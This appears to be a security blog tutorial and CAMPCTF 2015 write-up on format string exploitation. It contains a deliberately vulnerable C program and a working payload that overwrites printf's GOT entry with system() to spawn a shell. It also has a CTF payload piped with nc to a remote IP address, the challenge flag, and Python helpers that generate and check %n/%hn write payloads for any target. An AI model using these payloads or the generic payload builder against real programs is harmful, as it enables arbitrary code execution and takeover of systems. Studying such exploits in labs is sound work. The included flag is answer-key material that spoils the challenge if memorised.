Format String Exploit (OverWrite GOT)

Format String vulnerabilities seem very simple, but they are very powerful. They are silly mistakes made by programmers: user-controlled data is passed to printf() as the format argument.
In the problem given below (I have designed it on my own 😛 ) there is a format string bug that lets the attacker read from, and then write to, memory, which is manipulation he is not supposed to be able to do.

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {

    char buf[100];
    printf("Welcome to Format String Attack !!!!!!!\n");
    printf("Hello ");
    strncpy(buf, argv[1], 100);  /* argv[1] copied in unchecked; not NUL-terminated if it is 100 bytes or more */
    printf(buf);                 /* format string bug: user input is the format; this call performs the %n writes */
    printf(buf);                 /* same bug again; once printf's GOT entry is overwritten this call becomes system(buf) */
    return 0;

}

Here you are supposed to give your name as the argument. But what will a clever hacker do?

➜  ./format "%x-%x-%x-%x-%x-%x-%x-%x-%x"         
Welcome to Format String Attack !!!!!!!
Hello ffffd965-64-ffffd7b4-ffffd754-ffffd6c8-252d7825-78252d78-2d78252d-252d7825ffffd965-64-ffffd7b4-ffffd754-ffffd6c8-252d7825-78252d78-2d78252d-252d7825%             

So from this payload we learn that we can leak values from the stack. If you look closely at the output you will notice that from the sixth %x on, our own input is being printed back (0x252d7825 is the bytes "%x-%" read as a little-endian integer), because buf itself lives on the stack. That tells us the buffer starts at argument position 6. There is one more interesting format specifier for printf, "%n". From the man page of printf(3):

n   The number of characters written so far is stored into the integer pointed to by the corresponding argument. That argument shall be an int *, or variant whose size matches the (optionally) supplied integer length modifier. No argument is converted.

So for the input "AAAA%6$n", printf will try to write the value 4 into the address 0x41414141 (and crash, since that address is not mapped). Taking advantage of this, we will overwrite the GOT entry of printf with the address of system. printf has already been called once, so its GOT entry already holds the resolved libc address rather than the lazy-binding stub, and nothing will write it back afterwards; the second printf(buf) will then jump through the overwritten entry and run system(buf), which spawns a shell.

➜ objdump -d format
 
 08048370 <printf@plt>:
 8048370:       ff 25 0c a0 04 08       jmp    *0x804a00c
 8048376:       68 00 00 00 00          push   $0x0
 804837b:       e9 e0 ff ff ff          jmp    8048360 <_init+0x28>

➜ gdb -q format
b *main 
Breakpoint 1 at 0x80484cd
r
Breakpoint 1, 0x080484cd in main ()
p system
$1 = {<text variable, no debug info>} 0xf7e49190 <system>

So we need to write the address of system from libc (0xf7e49190) into 0x804a00c, the GOT slot that printf's PLT stub jumps through. This address is only stable with ASLR disabled: gdb turns ASLR off by default, but the exploit below runs outside gdb, so randomize_va_space must be off system-wide (otherwise the libc address has to be leaked first, for example with the %x trick above).
The padding is computed as

0x9190 - 12 = 37264 - 12 = 37252 
0xf7e4 - 0x9190 = 63460 - 37264 = 26196

12 is the number of bytes printed before the first %x: the prefix "sh;#\x0c\xa0\x04\x08\x0e\xa0\x04\x08", i.e. "sh;#" (4 bytes), the address 0x804a00c and the address 0x804a00e (4 bytes each). The prefix "sh;#" is there because after the overwrite the second printf(buf) becomes system(buf): sh runs the command "sh", and ";#" turns the rest of the buffer into a comment. Only characters printed by this printf call are counted, so "Welcome ..." and "Hello " from the earlier calls do not matter. Since the buffer is argument 6 and "sh;#" fills that slot, the two addresses land at argument positions 7 and 8.
I will overwrite 2 bytes of data at a time, for which I use the 'h' length modifier before n (%hn): first 0x9190 into 0x804a00c, then 0xf7e4 into 0x804a00e, ordering the writes by value so the character counter only ever has to grow.
Here is my exploit for that (Python 2 print syntax):

./format $(python -c 'print "sh;#\x0c\xa0\x04\x08\x0e\xa0\x04\x08%37252x%7$hn%26196x%8$hn"')

The first printf(buf) rewrites the GOT entry and the second one calls system("sh;#..."), so this exploit will spawn you a shell.
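The padding arithmetic above generalises to any set of %hn/%hhn/%n writes. The helper below is an added example (not code from the original post): given the (address, value) pairs, the argument position of the first address and the bytes already in front of them, it sorts the writes by value, computes each width so the counter only grows, and pads a width below 10 by a full wrap so that a %x argument wider than the field cannot throw the count off. The argument position 7 and the "sh;#" prefix are the ones from the payload above; everything else is my assumption.

```python
import struct


def halves(addr, value):
    """Split a 32-bit value into the two 16-bit writes that %hn needs (little-endian)."""
    return [(addr, value & 0xffff), (addr + 2, (value >> 16) & 0xffff)]


def fmt_payload(writes, first_arg, size=2, prefix=b"", already=0, conv="x"):
    """Build a printf payload that performs `writes` with %n-style conversions.

    writes    : list of (address, value); each value is stored with `size`
                bytes (1 -> %hhn, 2 -> %hn, 4 -> %n) at address, in the order
                the addresses are packed, so write i is argument first_arg + i.
    first_arg : positional index of the first packed address. On the binary
                above the buffer is argument 6 and "sh;#" fills that slot, so
                the addresses start at 7.
    prefix    : bytes placed in front of the addresses (b"sh;#" here).
    already   : characters this printf call printed before the payload.
                "Welcome ..." and "Hello " are separate calls, so 0 here.
    """
    mod = 1 << (8 * size)
    length = {1: "hh", 2: "h", 4: ""}[size]
    body = prefix + b"".join(struct.pack("<I", addr) for addr, _ in writes)
    if b"\x00" in body:
        raise ValueError("address contains a NUL byte; argv would be truncated")
    count = already + len(body)
    fmt = ""
    # Emit the writes in ascending order of value so the counter only ever grows.
    for i in sorted(range(len(writes)), key=lambda k: writes[k][1] % mod):
        pad = (writes[i][1] % mod - count) % mod
        # %Nx prints max(N, len(hex(arg))) characters; an unknown 32-bit value
        # takes up to 8 (%x) or 10 (%u) characters, so keep every width >= 10.
        if 0 < pad < 10:
            pad += mod
        if pad:
            fmt += "%%%d%s" % (pad, conv)
            count += pad
        fmt += "%%%d$%sn" % (first_arg + i, length)
    return body + fmt.encode()


if __name__ == "__main__":
    # Reproduces the payload used above: two %hn writes of system's address.
    print(repr(fmt_payload(halves(0x804a00c, 0xf7e49190), 7, prefix=b"sh;#")))
```

With size=1 the same helper emits four %hhn writes instead; that variant stores only one byte per write, so it never spills into the neighbouring bytes the way overlapping full-width %n writes do.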

hacker_level 200 CAMPCTF – 2015

This is another exploit problem that I solved with the help of my friend. It was a very simple FORMAT STRING vulnerability challenge, and since the source code was given it became even easier to solve.
The vulnerability of this challenge lies in

        usleep(150000);
        printf("Hello, ");
        printf(name);

the printf(name) that follows printf("Hello, ").
So the main goal of this challenge is to change the value of level to 0xCCC31337 using the format string. The main problem here is that the variable level is not on the stack; it is in the .bss section (at 0x804a04c, going by the addresses in the payload). Seeing all this, I remembered solving the same type of challenge in 'Exploit-exercises', Format: level3. Solving that challenge again, I solved this one.

Finally here is the exploit. The four addresses are the four bytes of level, 0x804a04c to 0x804a04f, at argument positions 7 to 10. Each %n stores a full 4-byte int, so the writes go from the lowest address to the highest and every later write overwrites the upper bytes of the previous one; only the low byte of each count has to be right (the last write also spills 0x03 0x00 0x00 into the three bytes after level). The prefix is 17 characters (four addresses plus the trailing space), so the counts are 17 + 294 = 311 = 0x137, + 220 = 531 = 0x213, + 176 = 707 = 0x2c3, + 265 = 972 = 0x3cc, leaving 0x37 0x13 0xc3 0xcc in memory, i.e. level = 0xCCC31337:

python -c 'print "\x4c\xa0\x04\x08"+ "\x4d\xa0\x04\x08"+ "\x4e\xa0\x04\x08" + "\x4f\xa0\x04\x08 "  + "%294u%7$n" + "%220u%8$n" + "%176u%9$n"+ "%265u%10$n"' | nc 144.76.92.167 10118
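Before firing either of the two payloads on this page it is worth replaying them through a model of printf's character counting. The following Python is an added example, not code from the original writeup: it parses the payload the way printf would, counts the literal bytes and the field widths, and for every positional %n, %hn or %hhn dereferences the address that sits in the payload itself at that argument slot (the buffer is argument 6 in the GOT exploit and the addresses start at argument 7 in the CAMPCTF one; those positions, the 32-bit slot size and "width chars are printed exactly" are the assumptions).

```python
import struct

SLOT = 4  # 32-bit process: every printf argument is one 4-byte stack slot


def simulate_printf(payload, buf_arg, mem=None, already=0):
    """Replay the character counting of printf(payload) and apply its %n writes.

    Assumes the payload starts at positional argument `buf_arg`, so argument k
    is the 4 bytes at payload[(k - buf_arg) * SLOT]; that is how the addresses
    embedded in the payload get dereferenced. %x/%u/%c are modelled as printing
    exactly their field width, which holds for the widths used here (a 32-bit
    value is at most 8 hex or 10 decimal characters).
    Returns (mem, count): the bytes written, keyed by address, and the number
    of characters the call would print.
    """
    mem = {} if mem is None else mem
    count = already
    i = 0
    while i < len(payload):
        if payload[i:i + 1] != b"%":
            count += 1          # literal byte, the packed addresses included
            i += 1
            continue
        i += 1
        # "%" [position "$"] [width] ["h" | "hh"] conversion
        j = i
        while payload[j:j + 1].isdigit():
            j += 1
        number = int(payload[i:j] or b"0")
        i = j
        pos, width = None, number
        if payload[i:i + 1] == b"$":
            pos, i = number, i + 1
            j = i
            while payload[j:j + 1].isdigit():
                j += 1
            width = int(payload[i:j] or b"0")
            i = j
        hmods = 0
        while payload[i:i + 1] == b"h":
            hmods += 1
            i += 1
        conv = payload[i:i + 1]
        i += 1
        if conv == b"%":
            count += 1
        elif conv == b"n":
            if pos is None:
                raise ValueError("only positional %n is modelled")
            off = (pos - buf_arg) * SLOT
            addr = struct.unpack("<I", payload[off:off + 4])[0]
            size = {0: 4, 1: 2, 2: 1}[hmods]          # %n, %hn, %hhn
            for k, b in enumerate((count % (1 << (8 * size))).to_bytes(size, "little")):
                mem[addr + k] = b
        else:
            count += max(width, 1)
    return mem, count


def read_u32(mem, addr):
    """Little-endian read of the 4 bytes at addr (unwritten bytes read as 0)."""
    return struct.unpack("<I", bytes(mem.get(addr + k, 0) for k in range(4)))[0]


if __name__ == "__main__":
    got = b"sh;#\x0c\xa0\x04\x08\x0e\xa0\x04\x08%37252x%7$hn%26196x%8$hn"
    mem, n = simulate_printf(got, buf_arg=6)
    print(hex(read_u32(mem, 0x804a00c)), n)      # printf@got -> system, 63460 chars
    ctf = (b"\x4c\xa0\x04\x08\x4d\xa0\x04\x08\x4e\xa0\x04\x08\x4f\xa0\x04\x08 "
           b"%294u%7$n%220u%8$n%176u%9$n%265u%10$n")
    mem, n = simulate_printf(ctf, buf_arg=7)
    print(hex(read_u32(mem, 0x804a04c)), n)      # level, 972 chars
```

The model also makes the two pitfalls visible: drop the trailing space from the CAMPCTF payload and every count is off by one, and the last full-width %n leaves 0x03 in the byte after level.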

And flag of this challenge is : CAMP15_337deec05ccc63b1168ba3379ae4d65854132604